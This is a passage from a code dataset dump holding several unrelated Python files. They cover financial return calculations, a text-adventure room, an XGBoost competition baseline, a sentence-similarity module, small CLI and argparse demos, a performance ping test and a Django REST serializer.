run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"465041568","text":"from scipy.optimize import newton\nimport numpy as np\n\n\n#############\n# standard dfs\n#############\ndef _get_merged_flow_and_value_df(flow_df, value_df):\n # test that the first df has a flow column and the second a value column\n assert 'flow' in flow_df.columns and 'value' in value_df.columns\n # merge the dfs and sort for date\n df = flow_df.merge(value_df, how='outer')\n df.sort_values(axis='rows', by=['date'], inplace=True)\n # test that in the last row is a value\n print(df)\n assert not np.isnan(df.iloc[-1, df.columns.get_loc('value')])\n # test that there are is always a value after a flow\n for i in range(0, df.shape[0]):\n if not np.isnan(df.iloc[i, df.columns.get_loc('flow')]):\n assert np.isnan(df.iloc[i + 1, df.columns.get_loc('flow')])\n # return the new df\n return df\n\n\ndef _get_value_with_flow_df(flow_df, value_df):\n # get the right df\n df = _get_merged_flow_and_value_df(flow_df, value_df)\n # shift the flows up to the values\n df.loc[:, 'flow'] = df.loc[:, 'flow'].shift(1)\n # drop the old flow rows\n df = df.loc[df.loc[:, 'value'].notna()]\n # test that the length is equal to the length of the value df\n assert len(df.index) == len(value_df.index)\n # fill the nan flow with 0\n df.loc[:, 'flow'].fillna(0, inplace=True)\n # return the combined df\n return df\n\n\n#############\n# time weighted return\n#############\ndef get_time_weighted_return_df(flow_df, value_df):\n # get the right df\n df = _get_value_with_flow_df(flow_df, value_df)\n # calculate twr for each sub period\n df.loc[:, 'twr'] = (df.loc[:, 'value'] - df.loc[:, 'flow']) / df.loc[:, 'value'].shift(1)\n # fill the first row twr value as it is nan\n df.iloc[0, df.columns.get_loc('twr')] = 1\n # return the df\n return df\n\n\ndef get_time_weighted_return(df):\n # test that all necessary columns are available\n assert 'twr' in df.columns\n # return nan if there are nan values in the twr column\n if df.loc[:, 'twr'].isnull().values.any():\n return np.nan\n # calculate twr\n time_weighted_return = df.loc[:, 'twr'].product() - 1\n # return the rate\n return time_weighted_return\n\n\n#############\n# internal rate of return\n#############\ndef get_internal_rate_of_return_df(flow_df, value_df):\n # get the right df\n df = _get_merged_flow_and_value_df(flow_df, value_df)\n # move the first value to the flow column if there is no flow\n if np.isnan(df.iloc[0, df.columns.get_loc('flow')]):\n df.iloc[0, df.columns.get_loc('flow')] = df.iloc[0, df.columns.get_loc('value')]\n # flip the flows\n df.loc[:, 'flow'] = df.loc[:, 'flow'] * (-1)\n # get the last value as flow\n df.iloc[-1, df.columns.get_loc('flow')] = df.iloc[-1, df.columns.get_loc('value')]\n # drop the nan rows\n df = df.loc[df.loc[:, 'flow'].notna()]\n # test that the length is equal to the length of the flow df plus the last row of the value df\n assert len(df.index) == len(flow_df.index) + 1 or len(df.index) == len(flow_df.index) + 2\n # drop the value column\n df = df.loc[:, ['date', 'flow']]\n # add the days column\n df.loc[:, 'days'] = df.loc[:, 'date'] - df.iloc[0, df.columns.get_loc('date')]\n # convert the days column to a number in days\n df.loc[:, 'days'] = df.loc[:, 'days'].map(lambda x: x.days)\n # return the df\n return df\n\n\ndef custom_xnpv(rate, df):\n # test that all necessary columns are available\n assert 'flow' in 
df.columns and 'days' in df.columns\n    # calculation\n    xnpv = 0\n    for i in range(0, df.shape[0]):\n        xnpv += df.iloc[i, df.columns.get_loc('flow')] / (1 + rate) ** df.iloc[i, df.columns.get_loc('days')]\n    # return the discounted sum\n    return xnpv\n\n\ndef get_daily_internal_rate_of_return(df, guess=0.000210874):\n    # test that all necessary columns are available\n    assert 'flow' in df.columns and 'days' in df.columns\n    # return nan if the last flow is 0 because that means that there is no money invested anymore\n    if df.iloc[-1, df.columns.get_loc('flow')] == 0:\n        return np.nan\n    # calculate the internal rate of return\n    internal_rate_of_return = newton(lambda rate: custom_xnpv(rate, df), guess)\n    # return the rate\n    return internal_rate_of_return\n\n\ndef get_internal_rate_of_return(df):\n    # get the daily rate\n    internal_rate_of_return = get_daily_internal_rate_of_return(df)\n    # turn the daily rate into the rate of the period\n    internal_rate_of_return = (1 + internal_rate_of_return) ** (df.iloc[-1, df.columns.get_loc('days')])\n    # return the rate\n    return internal_rate_of_return\n\n\n#############\n# current return\n#############\ndef get_current_return_df(flow_df, value_df):\n    # get the right df\n    df = _get_value_with_flow_df(flow_df, value_df)\n    # copy the first value to the flow column if there is no flow\n    if df.iloc[0, df.columns.get_loc('flow')] == 0:\n        df.iloc[0, df.columns.get_loc('flow')] = df.iloc[0, df.columns.get_loc('value')]\n    # init the invested_capital column\n    df.loc[:, 'invested_capital'] = None\n    # calculate the invested capital\n    for i in range(0, df.shape[0]):\n        flow = df.iloc[i, df.columns.get_loc('flow')]\n        previous_invested_capital = df.iloc[i-1, df.columns.get_loc('invested_capital')] if i > 0 else 0\n        if flow > 0:\n            invested_capital = previous_invested_capital + flow\n        elif flow < 0:\n            value = df.iloc[i, df.columns.get_loc('value')]\n            invested_capital = previous_invested_capital * (value / (abs(flow) + value))\n        else:\n            invested_capital = previous_invested_capital\n        df.iloc[i, df.columns.get_loc('invested_capital')] = invested_capital\n    # calculate the current return\n    df.loc[:, 'current_return'] = df.loc[:, 'value'] / df.loc[:, 'invested_capital']\n    # return the df\n    return df\n\n\ndef get_current_return(df):\n    # test that all necessary columns are available\n    assert 'current_return' in df.columns\n    # current return of a period is always the last value\n    current_return = df.iloc[-1, df.columns.get_loc('current_return')]\n    # return the current return\n    return current_return\n","sub_path":"finance/core/return_calculation.py","file_name":"return_calculation.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"611068236","text":"import time\nfrom random import randint\n\nfrom SalleEvenement import *\n\nclass SalleLevier(SalleEvenement):\n    def __init__(self, isExplore, gameMap, x, y, salleDroite, salleGauche, salleHaut, salleBas):\n        SalleEvenement.__init__(self, isExplore, x, y, salleDroite, salleGauche, salleHaut, salleBas)\n        self.__gameMap = gameMap\n\n    def declancherEvenement(self):\n        if (self.__gameMap.getLevierActive() == False):\n            print("You find and activate a lever.")\n            print("You hear a dull rumble in the distance...")\n            self.__gameMap.setLevierActive(True)\n            time.sleep(1.5)\n        else:\n            i = randint(0, 7)\n            if i <= 1:\n                return "bagarre"  # 'bagarre' (= fight) is the event code the caller reacts to\n","sub_path":"Code 
python/SalleLevier.py","file_name":"SalleLevier.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"617463188","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom xgboost import XGBClassifier\nfrom xgboost import XGBRegressor\nfrom sklearn.metrics import roc_auc_score\nimport os\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nimport lightgbm as lgb\nimport catboost as cbt\nimport category_encoders as ce\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import KFold, StratifiedKFold, train_test_split\n\n\nsubmission = pd.read_csv('./data/submission.csv')\ntrain = pd.read_csv('./data/train.csv')\ntest = pd.read_csv('./data/test.csv')\ntrain_label = pd.read_csv('./data/train_label.csv')\n\ntrain.head()\n\nnp.where(train.isnull().sum()/train.shape[0] < 0.5)[0]\ntrain.columns[np.where(train.isnull().sum()/train.shape[0] < 0.5)[0]]\n\ncolumns = ['ID', '企业类型', '登记机关', '企业状态', '邮政编码', '注册资本', '核准日期', '行业代码', '经营期限自',\n '成立日期', '行业门类', '企业类别', '管辖机关', '经营范围', '增值税', '企业所得税', '印花税', '教育费',\n '城建税']\n\ntrain[columns].isnull().sum()/train.shape[0]\n\ntrain['经营范围'].map(lambda x: len(x))\n\nfeature = ['企业类型', '登记机关', '企业状态', '注册资本', '行业代码',\n '行业门类', '企业类别', '管辖机关', '经营范围', '增值税', '企业所得税', '印花税', '教育费',\n '城建税']\n\ntrain[feature].head()\n\ntrain = train.merge(train_label, on='ID', how='left')\n\ndata = train.append(test)\n\ndata['经营范围'] = data['经营范围'].map(lambda x: len(x))\n\nobject_col = ['企业类型', '行业门类', '企业类别', '管辖机关']\nfor i in tqdm(object_col):\n lbl = LabelEncoder()\n data[i] = lbl.fit_transform(data[i].astype(str))\n data[i] = data[i]\n\ndata['企业所得税与增值税之比'] = data['增值税']/data['企业所得税']\n\nfeature += ['企业所得税与增值税之比']\n\ntr_index = ~data['Label'].isnull()\ntrain = data[tr_index].reset_index(drop=True)\ny = data[tr_index]['Label'].reset_index(drop=True).astype(int)\ntest = data[~tr_index].reset_index(drop=True)\nprint(train.shape, test.shape)\n\n\ndef lgb_roc_auc_score(y_hat, data):\n y_true = data.get_label()\n y_hat = np.round(y_hat)\n return 'f1', roc_auc_score(y_true, y_hat), True\n\n\nfi = []\ncv_score = []\ntest_pred = np.zeros((test.shape[0],))\nskf = StratifiedKFold(n_splits=5, random_state=2019, shuffle=True)\n\n\nfor index, (train_index, test_index) in enumerate(skf.split(train, y)):\n print(index)\n train_x, test_x, train_y, test_y = train.iloc[train_index], train.iloc[\n test_index], y.iloc[train_index], y.iloc[test_index]\n\n xgb_model = XGBRegressor(learning_rate=0.1,\n n_estimators=1000,\n max_depth=5,\n gamma=0,\n verbosity=1,\n subsample=0.8,\n # min_child_weight=1, \n objective='binary:logistic')\n eval_set = [(train_x[feature], train_y), (test_x[feature], test_y)]\n xgb_model.fit(train_x[feature], train_y, \n early_stopping_rounds = 20,\n eval_metric=[\"error\", \"logloss\",'auc'], \n eval_set=eval_set, verbose=20)\n\n y_val = xgb_model.predict(test_x[feature])\n # print(\"roc_auc:\", roc_auc_score(test_y, np.round(y_val)))\n print(\"roc_auc:\", roc_auc_score(test_y, y_val))\n cv_score.append(roc_auc_score(test_y, y_val))\n print(\"cv_score:\", cv_score[index])\n # test_pred += np.round(xgb_model.predict(test[feature])) / 5\n test_pred += xgb_model.predict(test[feature]) / 5\n# test_pred = [0.0 if r < 2.5 else 1.0 for r in test_pred ]\n\nsubmission['Label'] = test_pred\nsubmission.to_csv('submission_xgboost.csv', 
index=False)\n","sub_path":"shixinqiye/code/baseline_xgboost.py","file_name":"baseline_xgboost.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"125757535","text":"# -*- coding: utf-8 -*-\n\n################################################################################\n#\n#\tName: similarity.py\n#\tAuthor: Aaron[aderakhs@ualberta.ca]\n#\tDescription: Implements Semantic similarity measure for KNN learning algorithm\n#                based on Word2Vec[https://arxiv.org/abs/1301.3781] and based on\n#                Doc2Vec [https://arxiv.org/abs/1405.4053].\n#\n################################################################################\nimport Utility as util\nfrom scipy.spatial.distance import cosine\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom nltk.corpus import wordnet\nfrom gensim.models import Doc2Vec\nfrom gensim.test.test_doc2vec import ConcatenatedDoc2Vec\nfrom gensim.models.doc2vec import TaggedDocument\nimport gensim.models.doc2vec\nimport multiprocessing\nimport warnings, random, pickle, time\n\n\nclass SemanticSimilarity:\n    # measures the similarity between 2 sentences based on their components vector representations\n    @staticmethod\n    def cosine(sentence_1, sentence_2, combination='avg', window_size=None):\n        # gets two lists of word vectors (sentence_1 and sentence_2) and returns the cosine similarity\n        # of said sentences\n        if combination == 'avg':\n            # average mode\n            return 1-cosine(util.avg(sentence_1), util.avg(sentence_2))\n        else:\n            # Concatenate mode with sliding window\n            if window_size != None:\n                # if window size is set then a global window size would be used for both sentences\n                # we assume that the window size is smaller than the size of list\n                if (len(sentence_1) < window_size) or (len(sentence_2) < window_size):\n                    raise ValueError('`Window-size` should be smaller than the length of vectors')\n                else:\n                    # take the max over all window placements (a plain generator, so a float is returned)\n                    return max(\n                        1-cosine(util.cat(sentence_1[i:i+window_size]), util.cat(sentence_2[j:j+window_size]))\n                        for j in range(len(sentence_2)-window_size+1) for i in range(len(sentence_1)-window_size+1)\n                    )\n            else:\n                # if a global window size has not been set then the length of smaller sentence would be considered\n                # the window size\n                if len(sentence_1) == len(sentence_2):\n                    # if both sentences are of the same size\n                    return 1-cosine(util.cat(sentence_1), util.cat(sentence_2))\n                else:\n                    smaller, larger = (sentence_1, sentence_2) if len(sentence_1) < len(sentence_2) else (sentence_2, sentence_1)\n\n                    return max(\n                        1-cosine(util.cat(smaller), util.cat(larger[i:i+len(smaller)]))\n                        for i in range(len(larger)-len(smaller)+1)\n                    )\n\n    class Mihalcea2006:\n        # Based on paper "Mihalcea, Rada, Courtney Corley, and Carlo Strapparava. \n        # Corpus-based and knowledge-based measures of text semantic similarity. AAAI. Vol. 6. 
2006.\"\n # [https://www.aaai.org/Papers/AAAI/2006/AAAI06-123.pdf]\n def __init__(self, corpus):\n # In this implementation we consider each sentence a document, therefore a corpus is a list of all the\n # sentences\n self.corpus = corpus\n self.vectorizer = TfidfVectorizer(min_df=1)\n\n def computeIDF(self):\n # computes the inverse document frequency (idf) and term frequency (tf-idf) for each token\n self.tfidf_matrix = self.vectorizer.fit_transform(self.corpus)\n self.idf = dict(zip(self.vectorizer.get_feature_names(), self.vectorizer.idf_))\n \n def similarity(self, sentence_1, sentence_2, word_similarity='embedded'):\n \"\"\"\n 1- Description: computes the similarity of two sentences (pairwise) according to word_similarity metrics\n and based on (Mihalcea et al., 2006) work according to following formula:\n\n Sim(sentence_1, sentence_2) = 1/2 * [\n (Sum_{w_i in sentence_1}(maxSim(w_i, sentence_2)*idf(w_i))/Sum_{w_i in sentence_1}(idf(w_i))) +\n (Sum_{w_i in sentence_2}(maxSim(w_i, sentence_1)*idf(w_i))/Sum_{w_i in sentence_2}(idf(w_i))) ] \n\n 2- Parameters: \n * [word_similarity] = (\"embedded\", \"WordNet\", \"JC\", \"LC\", \"LIN\", \"WP\", \"Resnik\") where:\n 1- \"embedded\" uses word vectors as word similarity metric\n 2- \"WordNet\" uses word net's path similarity, \"Return a score denoting how similar two word senses are, \n based on the shortest path that connects the senses in the is-a (hypernym/hypnoym) taxonomy. \n The score is in the range 0 to 1\" [http://www.nltk.org/howto/wordnet.html]\n 3- \"JC\" or Jiang-Conrath Similarity \"Returns a score denoting how similar two word senses are, \n based on the Information Content (IC) of the Least Common Subsumer (most specific ancestor node) \n and that of the two input Synsets. The relationship is given by the equation \n 1 / (IC(s1) + IC(s2) - 2 * IC(lcs)).\" [Jiang, Jay J., and David W. Conrath. \n \"Semantic similarity based on corpus statistics and lexical taxonomy.\" arXiv preprint \n cmp-lg/9709008 (1997).]\n 4- \"LC\" or Leacock-Chodorow Similarity \"Returns a score denoting how similar two word senses are, \n based on the shortest path that connects the senses (as above) and the maximum depth of the taxonomy \n in which the senses occur. The relationship is given as -log(p/2d) where p is the shortest path \n length and d the taxonomy depth.\" [Leacock, Claudia, and Martin Chodorow. \n \"Combining local context and WordNet similarity for word sense identification.\" \n WordNet: An electronic lexical database 49.2 (1998): 265-283.]\n 5- \"LIN\" \"Return a score denoting how similar two word senses are, based on the Information Content (IC) \n of the Least Common Subsumer (most specific ancestor node) and that of the two input Synsets. \n The relationship is given by the equation 2 * IC(lcs) / (IC(s1) + IC(s2)).\"[Lin, Dekang. \n \"An information-theoretic definition of similarity.\" Icml. Vol. 98. No. 1998. 1998.]\n 6- \"WP\" or Wu-Palmer Similarity \"Returns a score denoting how similar two word senses are, \n based on the depth of the two senses in the taxonomy and that of their Least Common Subsumer.\"\n [Wu, Zhibiao, and Martha Palmer. \"Verbs semantics and lexical selection.\" \n Proceedings of the 32nd annual meeting on Association for Computational Linguistics. \n Association for Computational Linguistics, 1994.]\n 7- \"Resnik\" \"Return a score denoting how similar two word senses are, based on the Information Content (IC) \n of the Least Common Subsumer.\" [Resnik, Philip. 
\"Using information content to evaluate semantic similarity in a taxonomy.\" \n arXiv preprint cmp-lg/9511007 (1995).]\n\n * [sentence_1 or sentence_2] should be in for of a dictionary as follows\n {\n \"tokens\": [list of tokens],\n \"vectors\": [list of word vectors (if using with embedded metric)]\n } \n \"\"\"\n\n if word_similarity == 'embedded':\n # computes the max similarity between a vector, which represents a token, and a list vectors \n max_sim = lambda vec, sentence: max([\n 1-cosine(vec, v_i) for v_i in sentence['vectors']\n ])\n\n return 0.5 * (\n (\n sum([max_sim(v_i, sentence_2) * self.idf[token_i['text'].lower()] for v_i, token_i in zip(sentence_1['vectors'], sentence_1['tokens']) if token_i['pos'] not in ['PUNCT', 'SYM', 'X', 'PART']]) / \n sum([self.idf[token_i['text'].lower()] for token_i in sentence_1['tokens'] if token_i['pos'] not in ['PUNCT', 'SYM', 'X', 'PART']])\n ) + (\n sum([max_sim(v_i, sentence_1) * self.idf[token_i['text'].lower()] for v_i, token_i in zip(sentence_2['vectors'], sentence_2['tokens']) if token_i['pos'] not in ['PUNCT', 'SYM', 'X', 'PART']]) / \n sum([self.idf[token_i['text'].lower()] for token_i in sentence_2['tokens'] if token_i['pos'] not in ['PUNCT', 'SYM', 'X', 'PART']])\n )\n )\n else:\n # gold part of speech annotation to WordNet annotations\n gold_to_wn_conversion = {\n u'N': wordnet.NOUN,\n u'J': wordnet.ADJ,\n u'V': wordnet.VERB,\n u'R': wordnet.ADV\n }\n\n synset_1 = [\n (wordnet.synsets(token['text'], gold_to_wn_conversion[token['tag'][0]])[0], token['text'].lower()) for token in sentence_1['tokens'] if token['tag'][0] in ['N', 'J', 'V', 'R'] and len(wordnet.synsets(token['text'], gold_to_wn_conversion[token['tag'][0]]))>0\n ]\n synset_2 = [\n (wordnet.synsets(token['text'], gold_to_wn_conversion[token['tag'][0]])[0], token['text'].lower()) for token in sentence_2['tokens'] if token['tag'][0] in ['N', 'J', 'V', 'R'] and len(wordnet.synsets(token['text'], gold_to_wn_conversion[token['tag'][0]]))>0\n ]\n # computes similarity of two word(token) according to WordNet similarity\n # on problem with WordNet similarity measure is that it is not symmetric to solve this problem we simply assume\n # word_sim(w1, w2) = max[wnSim(w1, w2), wnSim(w2, w1)]\n if word_similarity == 'WordNet':\n # use path_similarity\n word_sim = lambda synset1, synset2: max([synset1.path_similarity(synset2), synset2.path_similarity(synset1)])\n elif word_similarity == 'JC':\n # use Jiang-Conrath Similarity\n word_sim = lambda synset1, synset2: max([synset1.jcn_similarity(synset2), synset2.jcn_similarity(synset1)])\n elif word_similarity == 'LC':\n # use Leacock-Chodorow Similarity\n word_sim = lambda synset1, synset2: max([synset1.lch_similarity(synset2), synset2.lch_similarity(synset1)])\n elif word_similarity == 'LIN':\n # use Lin Similarity\n word_sim = lambda synset1, synset2: max([synset1.lin_similarity(synset2), synset2.lin_similarity(synset1)])\n elif word_similarity == 'WP':\n # use Wu-Palmer Similarity\n word_sim = lambda synset1, synset2: max([synset1.wup_similarity(synset2), synset2.wup_similarity(synset1)])\n else:\n # use Resnik Similarity\n word_sim = lambda synset1, synset2: max([synset1.res_similarity(synset2), synset2.res_similarity(synset1)])\n\n \n # computes the max similarity between a token and a list of tokens\n max_sim = lambda synset, synsets: max([\n word_sim(synset, synset_i) for synset_i, token in synsets\n ])\n\n return 0.5 * (\n (\n sum([max_sim(synset, synset_2) * self.idf[token] for synset, token in synset_1]) / \n sum([self.idf[token] 
for synset, token in synset_1])\n ) + (\n sum([max_sim(synset, synset_1) * self.idf[token] for synset, token in synset_2]) / \n sum([self.idf[token] for synset, token in synset_2])\n )\n )\n\n class Le2014:\n # Based on paper \"Le, Quoc, and Tomas Mikolov. Distributed representations of sentences and documents.\n # International Conference on Machine Learning. 2014.\" [https://cs.stanford.edu/~quocle/paragraph_vector.pdf]\n # We use the implementation provided by python-gensim\n # For more information and notes on implementation please read \n # [https://github.com/RaRe-Technologies/gensim/blob/develop/docs/notebooks/doc2vec-IMDB.ipynb]\n def __init__(self, corpus, cores=None, config=None):\n if (gensim.models.doc2vec.FAST_VERSION > -1) == False:\n warnings.warn('Native training module is not loaded. In this case the training process will take unrealistically long time. Please refer to README 1.d clause.')\n\n # The number of active cores for training the model\n if cores != None:\n self.cores = cores\n else:\n # if not set, use all the available cpu cores\n self.cores = multiprocessing.cpu_count()\n\n self.corpus = []\n for sentence in corpus:\n # Doc2Vec model takes TaggedDocument instances as sample, therefore we turn or corpus to a list of TaggedDocuments\n # Each taggedDocument has a list of tokens and a tag; a tag could be an unique id by which we later measure the \n # similarity of sentence to other sentences [https://radimrehurek.com/gensim/models/doc2vec.html#gensim.models.doc2vec.TaggedDocument]\n self.corpus.append(TaggedDocument(sentence.text.decode(\"utf-8\").split(),[unicode(sentence.id)]))\n\n # Training parameters\n # [todo] configuration file\n \n # learning rate\n self.alpha = 0.025\n\n # Minimum learning rate; learning rate is reduced in each pass\n self.min_alpha = 0.001\n\n # Number of iteration during which the system reduces the error rate\n self.passes = 20\n\n \n # Defines models to train\n # Original model proposed in the paper; distributed memory model w/ negative sampling, window size 10 and concatenation\n # [todo] config file\n self.models = [\n # Original model proposed in the paper; distributed memory model w/ negative sampling, window size 10 and concatenation\n Doc2Vec(dm=1, size=300, window=10, dm_concat=1, negative=5, hs=0, min_count=2, workers=self.cores),\n\n # Original model proposed in the paper; distributed bag of words w/ negative sampling, window size 10 and concatenation\n Doc2Vec(dm=0, size=300, window=10, dm_concat=1, negative=5, hs=0, min_count=2, workers=self.cores),\n\n # Original model proposed in the paper; distributed memory model w/ negative sampling, window size 10 and average vectors\n Doc2Vec(dm=1, size=300, window=10, dm_mean=1, negative=5, hs=0, min_count=2, workers=self.cores)\n ]\n\n # we build vocab for one model and copy it to other models\n self.models[0].build_vocab(self.corpus)\n\n for model in self.models[1:3]:\n model.reset_from(self.models[0])\n \n\n # Combined models; \"Le and Mikolov notes that combining a paragraph vector from Distributed Bag of Words (DBOW) \n # and Distributed Memory (DM) improves performance.\"\n self.models.append(ConcatenatedDoc2Vec([self.models[0], self.models[1]]))\n self.models.append(ConcatenatedDoc2Vec([self.models[1], self.models[2]]))\n\n def train(self):\n # trains the system and produces the vectors\n random.shuffle(self.corpus)\n for model in self.models:\n model.train(self.corpus, total_examples=len(self.corpus), epochs=self.passes, start_alpha=self.alpha, end_alpha=self.min_alpha)\n\n 
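# --- Editorial sketch (not part of the original file): intended Le2014 usage ---
# Assuming `corpus` is a list of sentence objects exposing `.text` and `.id`,
# as the constructor above expects, a typical round trip looks roughly like:
#
#   sim = SemanticSimilarity.Le2014(corpus)
#   sim.train()                                   # shuffles the tagged corpus and trains every model
#   score = sim.similarity(corpus[0], corpus[1])  # mean of (1 - cosine distance) over the three base Doc2Vec models
#
# Note the original code targets Python 2 (`unicode`, `.decode("utf-8")`).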
def similarity(self, sentence_1, sentence_2):\n return sum([\n 1-cosine(model.docvecs[unicode(sentence_1.id)], model.docvecs[unicode(sentence_2.id)]) for model in self.models[0:3]\n ])/3\n \n def save(self):\n with open(\"le2014-%s.pickle\"%time.strftime(\"%Y-%m-%d-%H.%M.%S\"), 'w') as out:\n out.write(pickle.dumps(self))\n\nclass StatisticSimilarity:\n # Measures the statistical similarity amongst sentences\n @staticmethod\n def tfidf(corpus):\n # gets a corpus in form of a list of strings and computes the tfidf matrix\n return TfidfVectorizer().fit_transform(corpus)\n \n @staticmethod\n def tfidfSim(matrix, index):\n return cosine_similarity(matrix[index], matrix)\n\n","sub_path":"app/EntityAnalysis/SemanticSimilarity.py","file_name":"SemanticSimilarity.py","file_ext":"py","file_size_in_byte":16925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122140454","text":"#!/usr/bin/env python\n\nimport cli.app\n\n@cli.app.CommandLineApp\ndef lsof(app):\n app.stdout.write('running %s' % app.name)\n\nlsof.add_param(\"-a\", help=\"causes list selection options to be ANDed, as described above.\", default=False, action=\"store_true\")\nlsof.add_param(\"-b\", help=\"causes lsof to avoid kernel functions that might block - lstat(2), readlink(2), and stat(2).\", default=False, action=\"store_true\")\n\nif __name__ == '__main__':\n lsof.run()\n","sub_path":"examples/lsof.py","file_name":"lsof.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"345505538","text":"import argparse\nimport collections\n\ndefaults = {\n 'spam': 'default spam value',\n 'eggs': 'default egg value',\n}\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--spam')\nparser.add_argument('--eggs')\n\nargs = vars(parser.parse_args())\nprint(args)\n\nfiltered_args = {k: v for k, v in args.items() if v}\nprint(filtered_args)\n\ncombined = collections.ChainMap(filtered_args, defaults)\nprint(combined['spam'])\nprint(combined['eggs'])\nprint(combined)\nprint()","sub_path":"chianMapTest.py","file_name":"chianMapTest.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"569944761","text":"from test.perf.affinity import Topology\nfrom wait_for import TimedOutError\nimport time\nimport pytest\n\n\n@pytest.yield_fixture(\n scope=\"function\",\n params=[\n \"test/perf/topology-flat.yaml\",\n \"test/perf/topology-tree.yaml\",\n \"test/perf/topology-random.yaml\",\n ],\n ids=[\"flat\", \"tree\", \"random\"],\n)\ndef topology(request):\n topo = Topology.load_topology_from_file(request.param, use_diag_node=True)\n try:\n topo.start(wait=True)\n yield topo\n except TimedOutError:\n raise\n finally:\n print(f\"{time.time()} - Stopping current topo\")\n print(topo.nodes['controller'])\n topo.stop()\n\n\ndef test_pings_perf(topology):\n results = topology.ping()\n topology.validate_ping_results(results)\n","sub_path":"test/perf/test_ping.py","file_name":"test_ping.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"67938591","text":"from rest_framework import serializers\nfrom garageApp.models import Garage, Owner_Detail, Garage_Detail, Garage_Service\nfrom dateutil import parser\n\n\ndef dataTypeConverter(val, type):\n \"\"\"\n convert val into type which can be ('INT', 'CHAR', 'DEC', 'BOOLEAN', 
'DATETIME', 'LONG') datatype\n \"\"\"\n if type == \"INT\":\n return int(val)\n elif type == \"CHAR\":\n return str(val)\n elif type == \"DEC\":\n return float(val)\n elif type == \"BOOLEAN\":\n if val == None:\n return False\n val = str(val).lower()\n if val[0] == 'o' or val[0] == 't' or val[0] == 'y':\n return True\n else:\n return False\n elif type == \"DATETIME\":\n return parser.parse(val)\n elif type == \"LONG\":\n return long(val)\n\n\nclass GarageSerializer(serializers.ModelSerializer):\n class Meta:\n model = Garage\n fields = (\n 'Garage_ID', 'Garage_Name', 'Address', 'Suburb', 'City', 'State', 'Year_Establishment', 'Latitude', 'Longitude',\n 'Garage_Type', 'Make', 'Area_Garage', 'Region_ID')\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new `Garage` instance, given the validated data.\n \"\"\"\n return Garage.objects.create(**validated_data)\n\n def make_validations(self, instance, data):\n \"\"\"\n return validated_data from data for `Garage` instance\n \"\"\"\n data['Garage_ID'] = data.get('Garage_ID', instance.Garage_ID)\n data['Garage_Name'] = data.get('Garage_Name', instance.Garage_Name)\n data['Address'] = data.get('Address', instance.Address)\n data['Suburb'] = data.get('Suburb', instance.Suburb)\n data['City'] = data.get('City', instance.City)\n data['State'] = data.get('State', instance.State)\n data['Year_Establishment'] = data.get('Year_Establishment', instance.Year_Establishment)\n data['Latitude'] = data.get('Latitude', instance.Latitude)\n data['Longitude'] = data.get('Longitude', instance.Longitude)\n data['Garage_Type'] = data.get('Garage_Type', instance.Garage_Type)\n data['Make'] = data.get('Make', instance.Make)\n data['Area_Garage'] = data.get('Area_Garage', instance.Area_Garage)\n data['Region_ID'] = data.get('Region_ID', instance.Region_ID)\n return data\n\n def getFormData(self, request):\n \"\"\"\n Return Form Data from POST Request\n \"\"\"\n data = {}\n datatype = {}\n datatype['Garage_ID'] = \"INT\"\n datatype['Garage_Name'] = \"CHAR\"\n datatype['Address'] = \"CHAR\"\n datatype['Suburb'] = \"CHAR\"\n datatype['City'] = \"CHAR\"\n datatype['State'] = \"CHAR\"\n datatype['Year_Establishment'] = \"DATETIME\"\n datatype['Latitude'] = \"DEC\"\n datatype['Longitude'] = \"DEC\"\n datatype['Garage_Type'] = \"CHAR\"\n datatype['Make'] = \"CHAR\"\n datatype['Area_Garage'] = \"DEC\"\n datatype['Region_ID'] = \"INT\"\n for field in self.fields.keys():\n data[field] = request.POST.get(field, None)\n if data[field] != None:\n data[field] = dataTypeConverter(data[field], datatype[field])\n return data\n\n def getRelatedAttributes(self):\n related_attributes = ['Region_ID']\n return related_attributes\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing `Garage` instance, given the validated data.\n \"\"\"\n instance.Garage_ID = validated_data.get('Garage_ID', instance.Garage_ID)\n instance.Garage_Name = validated_data.get('Garage_Name', instance.Garage_Name)\n instance.Address = validated_data.get('Address', instance.Address)\n instance.Suburb = validated_data.get('Suburb', instance.Suburb)\n instance.City = validated_data.get('City', instance.City)\n instance.State = validated_data.get('State', instance.State)\n instance.Year_Establishment = validated_data.get('Year_Establishment', instance.Year_Establishment)\n instance.Latitude = validated_data.get('Latitude', instance.Latitude)\n instance.Longitude = validated_data.get('Longitude', instance.Longitude)\n instance.Garage_Type = 
